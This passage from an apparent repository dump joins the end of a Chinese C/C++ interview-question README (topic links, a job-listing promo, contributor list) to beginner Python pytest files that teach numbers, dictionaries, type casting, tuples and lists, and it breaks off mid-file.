C/C++语言中野指针的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#939cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%87%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%90%AB%E4%B9%89) ##### [20.6.3 C/C++语言中文件布局在内存中的映射](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#940cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%96%87%E4%BB%B6%E5%B8%83%E5%B1%80%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E6%98%A0%E5%B0%84) ##### [20.6.4 C/C++语言中程序与进程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#941cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%A8%8B%E5%BA%8F%E4%B8%8E%E8%BF%9B%E7%A8%8B) ##### [20.6.5 C/C++程序中的静态存储区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#942cc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E9%9D%99%E6%80%81%E5%AD%98%E5%82%A8%E5%8C%BA) ##### [20.6.6 C/C++程序中的堆](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#943cc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E5%A0%86) ##### [20.6.7 C语言中calloc 和 realloc 函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#945c%E8%AF%AD%E8%A8%80%E4%B8%ADcalloc-%E5%92%8C-realloc-%E5%87%BD%E6%95%B0) ##### [20.6.8 malloc和free函数及使用过程需要注意的地方](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#946malloc%E5%92%8Cfree%E5%87%BD%E6%95%B0%E5%8F%8A%E4%BD%BF%E7%94%A8%E8%BF%87%E7%A8%8B%E9%9C%80%E8%A6%81%E6%B3%A8%E6%84%8F%E7%9A%84%E5%9C%B0%E6%96%B9) ##### [20.6.9 C语言中动态内存分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#947c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D) ##### [20.7.1 C语言中的指针阅读技巧](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#948c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%8C%87%E9%92%88%E9%98%85%E8%AF%BB%E6%8A%80%E5%B7%A7) ##### [20.7.2 C语言中的函数指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#949c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88) ##### [20.7.3 C语言中指向指针的指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#950c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%8C%87%E5%90%91%E6%8C%87%E9%92%88%E7%9A%84%E6%8C%87%E9%92%88) ##### [20.7.4 C语言中的数组指针和指针数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#951c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%95%B0%E7%BB%84%E6%8C%87%E9%92%88%E5%92%8C%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [20.7.5 C语言中字符串相等的比较](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#952c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9B%B8%E7%AD%89%E7%9A%84%E6%AF%94%E8%BE%83) ##### [20.7.6 C语言中的字符串和字符数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#953c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%92%8C%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [20.7.7 数组参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#954%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0) ##### [20.7.8 数组的访问方式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#955%E6%95%B0%E7%BB%84%E7%9A%84%E8%AE%BF%E9%97%AE%E6%96%B9%E5%BC%8F) ##### [20.7.9 数组地址与数组名](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#956%E6%95%B0%E7%BB%84%E5%9C%B0%E5%9D%80%E4%B8%8E%E6%95%B0%E7%BB%84%E5%90%8D) ##### [20.8.1 C++中类封装的基本概念](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#957c%E4%B8%AD%E7%B1%BB%E5%B0%81%E8%A3%85%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5) ##### [20.8.2 C++中的引用基本点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#958c%E4%B8%AD%E7%9A%84%E5%BC%95%E7%94%A8%E5%9F%BA%E6%9C%AC%E7%82%B9) ##### [20.8.3 函数设计原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#959%E5%87%BD%E6%95%B0%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99) ##### [20.8.4 C语言中的回调函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#960c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0) ##### [20.8.5 C语言中二维数组参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#961c%E8%AF%AD%E8%A8%80%E4%B8%AD%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0) ##### [20.8.6 数组的本质](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#962%E6%95%B0%E7%BB%84%E7%9A%84%E6%9C%AC%E8%B4%A8) ##### [20.8.7 数组的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#963%E6%95%B0%E7%BB%84%E7%9A%84%E5%90%AB%E4%B9%89) ##### [20.8.8 C语言中#pragma 的使用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#964c%E8%AF%AD%E8%A8%80%E4%B8%ADpragma-%E7%9A%84%E4%BD%BF%E7%94%A8) ##### [20.8.9 C语言中#line的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#965c%E8%AF%AD%E8%A8%80%E4%B8%ADline%E7%9A%84%E7%94%A8%E6%B3%95) ##### [20.9.1 C语言中#error的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#966c%E8%AF%AD%E8%A8%80%E4%B8%ADerror%E7%9A%84%E7%94%A8%E6%B3%95) ##### [20.9.2 c语言中数组参数退化为指针的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#967c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0%E9%80%80%E5%8C%96%E4%B8%BA%E6%8C%87%E9%92%88%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.9.3 程序中的顺序点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#968%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E9%A1%BA%E5%BA%8F%E7%82%B9) ##### [20.9.4 面向过程的程序设计](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#969%E9%9D%A2%E5%90%91%E8%BF%87%E7%A8%8B%E7%9A%84%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1) ##### [20.9.5 C语言中的函数类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#970c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E7%B1%BB%E5%9E%8B) ##### [20.9.6 C语言二维数组与二级指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#971c%E8%AF%AD%E8%A8%80%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84%E4%B8%8E%E4%BA%8C%E7%BA%A7%E6%8C%87%E9%92%88) ##### [20.9.7 C语言中字符串的长度](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#972c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E9%95%BF%E5%BA%A6) ##### [20.9.8 指针的运算](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#973%E6%8C%87%E9%92%88%E7%9A%84%E8%BF%90%E7%AE%97) ##### [20.9.9 数组名的知识点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#974%E6%95%B0%E7%BB%84%E5%90%8D%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9) ##### [21.1.1 C语言中的条件编译](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#975c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%9D%A1%E4%BB%B6%E7%BC%96%E8%AF%91) ##### [21.1.2 C语言中函数和宏定义的对比](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#976c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%87%BD%E6%95%B0%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E7%9A%84%E5%AF%B9%E6%AF%94) ##### [21.1.3 c语言中动态库和静态库的使用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#977c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93%E7%9A%84%E4%BD%BF%E7%94%A8) ##### [21.1.4 c语言中的逗号表达式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#978c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E9%80%97%E5%8F%B7%E8%A1%A8%E8%BE%BE%E5%BC%8F) ##### [21.1.5 C语言中的单引号和双引号](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#979c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7) ##### [21.1.6 C语言中接续符和转义符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#980c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%8E%A5%E7%BB%AD%E7%AC%A6%E5%92%8C%E8%BD%AC%E4%B9%89%E7%AC%A6) ##### [21.1.7 C语言中union关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#981c%E8%AF%AD%E8%A8%80%E4%B8%ADunion%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.1.8 C语言中变量的属性关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#982c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8F%98%E9%87%8F%E7%9A%84%E5%B1%9E%E6%80%A7%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.1.9 c语言中enum关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#983c%E8%AF%AD%E8%A8%80%E4%B8%ADenum%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.1 C语言中sizeof关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#984c%E8%AF%AD%E8%A8%80%E4%B8%ADsizeof%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.2 c语言中extern关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#985c%E8%AF%AD%E8%A8%80%E4%B8%ADextern%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.3 C语言中volatile关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#986c%E8%AF%AD%E8%A8%80%E4%B8%ADvolatile%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.4 C语言中const关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#987c%E8%AF%AD%E8%A8%80%E4%B8%ADconst%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.5 ‘#’与‘##’的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#988%E4%B8%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.2.6 如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#989%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F) ##### [21.2.7 大小端问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#990%E5%A4%A7%E5%B0%8F%E7%AB%AF%E9%97%AE%E9%A2%98) ##### [21.2.8 typedef关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#991typedef%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.2.9 什么是封装?C++中是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#992%E4%BB%80%E4%B9%88%E6%98%AF%E5%B0%81%E8%A3%85c%E4%B8%AD%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [21.3.1 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#993c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [21.3.2 内存的分配方式的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#994%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [21.3.3 头文件中的 ifndef/define/endif 干什么用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#995%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8) ##### [21.3.4 什么是预编译?何时需要预编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#996%E4%BB%80%E4%B9%88%E6%98%AF%E9%A2%84%E7%BC%96%E8%AF%91%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E9%A2%84%E7%BC%96%E8%AF%91) ##### [21.3.5 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#997%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [21.3.6 memset ,memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#998memset-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.3.7 一下三种指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#999%E4%B8%80%E4%B8%8B%E4%B8%89%E7%A7%8D%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.3.8 “常量指针”和“指针常量”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#1000%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E5%92%8C%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) <br/> <br/> <h3 >零领工作</h3> --- ##### 实时提供,每周发布北京,上海,广州,深圳,杭州,南京,合肥,武汉,长沙,重庆,成都,西安,厦门的c/c++,golang方向的招聘岗位信息。 校招,社招,实习岗位都有的。 面经,八股,简历都有的 <img src="https://img.0voice.com/public/0e59910091576beaebe20f303357edf7.jpg" alt="零领工作" style="width:300px;height:300px;"> <br/> <br/> ## 鸣谢 ##### 感谢各位贡献patch的朋友, 还很多在issue里面出谋划策的朋友,为此衷心感谢。使得该repo能够在github趋势榜,持续一周时间问鼎排行榜。 <a href="https://github.com/zhiyong0804"> <img src="https://avatars2.githubusercontent.com/u/15864088?s=400&v=4" width="40px"> </a> <a href="https://github.com/wangbojing"> <img src="https://avatars2.githubusercontent.com/u/18027560?s=400&v=4" width="40px"> </a> <a href="https://github.com/pyinx"> <img src="https://avatars1.githubusercontent.com/u/3828540?s=400&v=4" width="40px"> </a> <a href="https://github.com/ileler"> <img src="https://avatars3.githubusercontent.com/u/3371163?s=400&v=4" width="40px"> </a> <a href="https://github.com/jiaoqiyuan"> <img src="https://avatars3.githubusercontent.com/u/13357933?s=400&v=4" width="40px"> </a> <a href="https://github.com/seniorcandy"> <img src="https://avatars1.githubusercontent.com/u/11422477?s=400&v=4" width="40px"> </a> <a href="https://github.com/kphn"> <img src="https://avatars1.githubusercontent.com/u/35964821?s=400&v=4" width="40px"> </a> <a href="https://github.com/OhIAmFine"> <img src="https://avatars0.githubusercontent.com/u/10390004?s=400&v=4" width="40px"> </a> <a href="https://github.com/ArtarisCN"> <img src="https://avatars2.githubusercontent.com/u/19167403?s=400&v=4" width="40px"> </a> <a href="https://github.com/Octobug"> <img src="https://avatars1.githubusercontent.com/u/8007022?s=400&v=4" width="40px"> </a> <a href="https://github.com/SenZhangAI"> <img src="https://avatars0.githubusercontent.com/u/8464676?s=400&v=4" width="40px"> </a> <a href="https://github.com/wansho"> <img src="https://avatars2.githubusercontent.com/u/28779244?s=400&v=4" width="40px"> </a> <a href="https://github.com/dengchaoyun007"> <img src="https://avatars1.githubusercontent.com/u/38239467?s=400&v=4" width="40px"> </a> <a href="https://github.com/FanShikun"> <img src="https://avatars1.githubusercontent.com/u/30170514?s=400&v=4" width="40px"> </a> <a href="https://github.com/Carmon-Lee"> <img src="https://avatars3.githubusercontent.com/u/29457756?s=400&v=4" width="40px"> </a> <a href="https://github.com/gytHW"> <img src="https://avatars3.githubusercontent.com/u/13961667?s=400&v=4" width="40px"> </a> <a href="https://github.com/keytouch"> <img src="https://avatars0.githubusercontent.com/u/20770013?s=400&v=4" width="40px"> </a> <a href="https://github.com/SJshenjian"> <img src="https://avatars0.githubusercontent.com/u/25132537?s=400&v=4" width="40px"> </a> <a href="https://github.com/likunyao"> <img src="https://avatars3.githubusercontent.com/u/16969814?s=400&v=4" width="40px"> </a> <tr> <a href="https://github.com/xiepeiyang"> <img src="https://avatars0.githubusercontent.com/u/8435589?s=400&v=4" width="40px"> </a> <a href="https://github.com/fnlearner"> <img src="https://avatars3.githubusercontent.com/u/38586156?s=400&v=4" width="40px"> </a> <a href="https://github.com/Macyrate"> <img src="https://avatars2.githubusercontent.com/u/20154121?s=400&v=4" width="40px"> </a> <a href="https://github.com/63isOK"> <img src="https://avatars2.githubusercontent.com/u/45553405?s=400&v=4" width="40px"> </a> <a href="https://github.com/Innei"> <img src="https://avatars3.githubusercontent.com/u/41265413?s=400&v=4" width="40px"> </a> <a href="https://github.com/EvanLeung08"> <img src="https://avatars0.githubusercontent.com/u/9621088?s=400&v=4" width="40px"> </a> <a href="https://github.com/yttsam"> <img src="https://avatars0.githubusercontent.com/u/51710251?s=400&v=4" width="40px"> </a> <br> <br> ## 加入 gitter 讨论组 https://gitter.im/im0voice/interview_internal_reference
learn-python
52c3a655cc2efd5ac01004f6f529c3262812a84e
File: src/data_types/test_numbers.py """Numbers. @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_numbers.asp There are three numeric types in Python: - int (e.g. 2, 4, 20) - bool (e.g. False and True, acting like 0 and 1) - float (e.g. 5.0, 1.6) - complex (e.g. 5+6j, 4-3j) """ def test_integer_numbers(): """Integer type Int, or integer, is a whole number, positive or negative, without decimals, of unlimited length. """ positive_integer = 1 negative_integer = -3255522 big_integer = 35656222554887711 assert isinstance(positive_integer, int) assert isinstance(negative_integer, int) assert isinstance(big_integer, int) def test_booleans(): """Boolean Booleans represent the truth values False and True. The two objects representing the values False and True are the only Boolean objects. The Boolean type is a subtype of the integer type, and Boolean values behave like the values 0 and 1, respectively, in almost all contexts, the exception being that when converted to a string, the strings "False" or "True" are returned, respectively. """ true_boolean = True false_boolean = False assert true_boolean assert not false_boolean assert isinstance(true_boolean, bool) assert isinstance(false_boolean, bool) # Let's try to cast boolean to string. assert str(true_boolean) == "True" assert str(false_boolean) == "False" def test_float_numbers(): """Float type Float, or "floating point number" is a number, positive or negative, containing one or more decimals. """ float_number = 7.0 # Another way of declaring float is using float() function. float_number_via_function = float(7) float_negative = -35.59 assert float_number == float_number_via_function assert isinstance(float_number, float) assert isinstance(float_number_via_function, float) assert isinstance(float_negative, float) # Float can also be scientific numbers with an "e" to indicate # the power of 10. float_with_small_e = 35e3 float_with_big_e = 12E4 assert float_with_small_e == 35000 assert float_with_big_e == 120000 assert isinstance(12E4, float) assert isinstance(-87.7e100, float) def test_complex_numbers(): """Complex Type""" complex_number_1 = 5 + 6j complex_number_2 = 3 - 2j assert isinstance(complex_number_1, complex) assert isinstance(complex_number_2, complex) assert complex_number_1 * complex_number_2 == 27 + 8j def test_number_operators(): """Basic operations""" # Addition. assert 2 + 4 == 6 # Multiplication. assert 2 * 4 == 8 # Division always returns a floating point number. assert 12 / 3 == 4.0 assert 12 / 5 == 2.4 assert 17 / 3 == 5.666666666666667 # Modulo operator returns the remainder of the division. assert 12 % 3 == 0 assert 13 % 3 == 1 # Floor division discards the fractional part. assert 17 // 3 == 5 # Raising the number to specific power. assert 5 ** 2 == 25 # 5 squared assert 2 ** 7 == 128 # 2 to the power of 7 # There is full support for floating point; operators with # mixed type operands convert the integer operand to floating point. assert 4 * 3.75 - 1 == 14.0 File: src/data_types/test_dictionaries.py """Dictionaries. @see: https://docs.python.org/3/tutorial/datastructures.html#dictionaries @see: https://www.w3schools.com/python/python_dictionaries.asp A dictionary is a collection which is unordered, changeable and indexed. In Python dictionaries are written with curly brackets, and they have keys and values. Dictionaries are sometimes found in other languages as “associative memories” or “associative arrays”. Unlike sequences, which are indexed by a range of numbers, dictionaries are indexed by keys, which can be any immutable type; strings and numbers can always be keys. Tuples can be used as keys if they contain only strings, numbers, or tuples; if a tuple contains any mutable object either directly or indirectly, it cannot be used as a key. You can’t use lists as keys, since lists can be modified in place using index assignments, slice assignments, or methods like append() and extend(). It is best to think of a dictionary as a set of key: value pairs, with the requirement that the keys are unique (within one dictionary). A pair of braces creates an empty dictionary: {}. Placing a comma-separated list of key:value pairs within the braces adds initial key:value pairs to the dictionary; this is also the way dictionaries are written on output. """ def test_dictionary(): """Dictionary""" fruits_dictionary = { 'cherry': 'red', 'apple': 'green', 'banana': 'yellow', } assert isinstance(fruits_dictionary, dict) # You may access set elements by keys. assert fruits_dictionary['apple'] == 'green' assert fruits_dictionary['banana'] == 'yellow' assert fruits_dictionary['cherry'] == 'red' # To check whether a single key is in the dictionary, use the in keyword. assert 'apple' in fruits_dictionary assert 'pineapple' not in fruits_dictionary # Change the apple color to "red". fruits_dictionary['apple'] = 'red' # Add new key/value pair to the dictionary fruits_dictionary['pineapple'] = 'yellow' assert fruits_dictionary['pineapple'] == 'yellow' # Performing list(d) on a dictionary returns a list of all the keys used in the dictionary, # in insertion order (if you want it sorted, just use sorted(d) instead). assert list(fruits_dictionary) == ['cherry', 'apple', 'banana', 'pineapple'] assert sorted(fruits_dictionary) == ['apple', 'banana', 'cherry', 'pineapple'] # It is also possible to delete a key:value pair with del. del fruits_dictionary['pineapple'] assert list(fruits_dictionary) == ['cherry', 'apple', 'banana'] # The dict() constructor builds dictionaries directly from sequences of key-value pairs. dictionary_via_constructor = dict([('sape', 4139), ('guido', 4127), ('jack', 4098)]) assert dictionary_via_constructor['sape'] == 4139 assert dictionary_via_constructor['guido'] == 4127 assert dictionary_via_constructor['jack'] == 4098 # In addition, dict comprehensions can be used to create dictionaries from arbitrary key # and value expressions: dictionary_via_expression = {x: x**2 for x in (2, 4, 6)} assert dictionary_via_expression[2] == 4 assert dictionary_via_expression[4] == 16 assert dictionary_via_expression[6] == 36 # When the keys are simple strings, it is sometimes easier to specify pairs using # keyword arguments. dictionary_for_string_keys = dict(sape=4139, guido=4127, jack=4098) assert dictionary_for_string_keys['sape'] == 4139 assert dictionary_for_string_keys['guido'] == 4127 assert dictionary_for_string_keys['jack'] == 4098 File: src/data_types/test_type_casting.py """Type casting. @see: https://www.w3schools.com/python/python_casting.asp There may be times when you want to specify a type on to a variable. This can be done with casting. Python is an object-orientated language, and as such it uses classes to define data types, including its primitive types. Casting in python is therefore done using constructor functions: - int() - constructs an integer number from an integer literal, a float literal (by rounding down to the previous whole number) literal, or a string literal (providing the string represents a whole number) - float() - constructs a float number from an integer literal, a float literal or a string literal (providing the string represents a float or an integer) - str() - constructs a string from a wide variety of data types, including strings, integer literals and float literals """ def test_type_casting_to_integer(): """Type casting to integer""" assert int(1) == 1 assert int(2.8) == 2 assert int('3') == 3 def test_type_casting_to_float(): """Type casting to float""" assert float(1) == 1.0 assert float(2.8) == 2.8 assert float("3") == 3.0 assert float("4.2") == 4.2 def test_type_casting_to_string(): """Type casting to string""" assert str("s1") == 's1' assert str(2) == '2' assert str(3.0) == '3.0' File: src/data_types/test_tuples.py """Tuples. @see: https://www.w3schools.com/python/python_tuples.asp @see: https://docs.python.org/3/tutorial/datastructures.html#tuples-and-sequences A tuple is a collection which is ordered and unchangeable. In Python tuples are written with round brackets. The Tuples have following properties: - You cannot change values in a tuple. - You cannot remove items in a tuple. """ import pytest def test_tuples(): """Tuples""" fruits_tuple = ("apple", "banana", "cherry") assert isinstance(fruits_tuple, tuple) assert fruits_tuple[0] == "apple" assert fruits_tuple[1] == "banana" assert fruits_tuple[2] == "cherry" # You cannot change values in a tuple. with pytest.raises(Exception): # pylint: disable=unsupported-assignment-operation fruits_tuple[0] = "pineapple" # It is also possible to use the tuple() constructor to make a tuple (note the double # round-brackets). # The len() function returns the length of the tuple. fruits_tuple_via_constructor = tuple(("apple", "banana", "cherry")) assert isinstance(fruits_tuple_via_constructor, tuple) assert len(fruits_tuple_via_constructor) == 3 # It is also possible to omit brackets when initializing tuples. another_tuple = 12345, 54321, 'hello!' assert another_tuple == (12345, 54321, 'hello!') # Tuples may be nested: nested_tuple = another_tuple, (1, 2, 3, 4, 5) assert nested_tuple == ((12345, 54321, 'hello!'), (1, 2, 3, 4, 5)) # As you see, on output tuples are always enclosed in parentheses, so that nested tuples are # interpreted correctly; they may be input with or without surrounding parentheses, although # often parentheses are necessary anyway (if the tuple is part of a larger expression). It is # not possible to assign to the individual items of a tuple, however it is possible to create # tuples which contain mutable objects, such as lists. # A special problem is the construction of tuples containing 0 or 1 items: the syntax has some # extra quirks to accommodate these. Empty tuples are constructed by an empty pair of # parentheses; a tuple with one item is constructed by following a value with a comma (it is # not sufficient to enclose a single value in parentheses). Ugly, but effective. For example: empty_tuple = () # pylint: disable=len-as-condition assert len(empty_tuple) == 0 # pylint: disable=trailing-comma-tuple singleton_tuple = 'hello', # <-- note trailing comma assert len(singleton_tuple) == 1 assert singleton_tuple == ('hello',) # The following example is called tuple packing: packed_tuple = 12345, 54321, 'hello!' # The reverse operation is also possible. first_tuple_number, second_tuple_number, third_tuple_string = packed_tuple assert first_tuple_number == 12345 assert second_tuple_number == 54321 assert third_tuple_string == 'hello!' # This is called, appropriately enough, sequence unpacking and works for any sequence on the # right-hand side. Sequence unpacking requires that there are as many variables on the left # side of the equals sign as there are elements in the sequence. Note that multiple assignment # is really just a combination of tuple packing and sequence unpacking. # Swapping using tuples. # Data can be swapped from one variable to another in python using # tuples. This eliminates the need to use a 'temp' variable. first_number = 123 second_number = 456 first_number, second_number = second_number, first_number assert first_number == 456 assert second_number == 123 File: src/data_types/test_lists.py """Lists. # @see: https://www.learnpython.org/en/Lists # @see: https://docs.python.org/3/tutorial/introduction.html # @ee: https://docs.python.org/3/tutorial/datastructures.html#more-on-lists Python knows a number of compound data types, used to group together other values. The most versatile is the list, which can be written as a list of comma-separated values (items) between square brackets. Lists might contain items of different types, but usually the items all have the same type. """ import pytest def test_list_type(): """List type.""" # Lists are very similar to arrays. They can contain any type of variable, and they can contain # as many variables as you wish. Lists can also be iterated over in a very simple manner. # Here is an example of how to build a list. squares = [1, 4, 9, 16, 25] assert isinstance(squares, list) # Like strings (and all other built-in sequence type), lists can be # indexed and sliced: assert squares[0] == 1 # indexing returns the item assert squares[-1] == 25 assert squares[-3:] == [9, 16, 25] # slicing returns a new list # All slice operations return a new list containing the requested elements. # This means that the following slice returns a new (shallow) copy of # the list: assert squares[:] == [1, 4, 9, 16, 25] # Lists also support operations like concatenation: assert squares + [36, 49, 64, 81, 100] == [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] # Unlike strings, which are immutable, lists are a mutable type, i.e. it # is possible to change their content: cubes = [1, 8, 27, 65, 125] # something's wrong here, the cube of 4 is 64! cubes[3] = 64 # replace the wrong value assert cubes == [1, 8, 27, 64, 125] # You can also add new items at the end of the list, by using # the append() method cubes.append(216) # add the cube of 6 cubes.append(7 ** 3) # and the 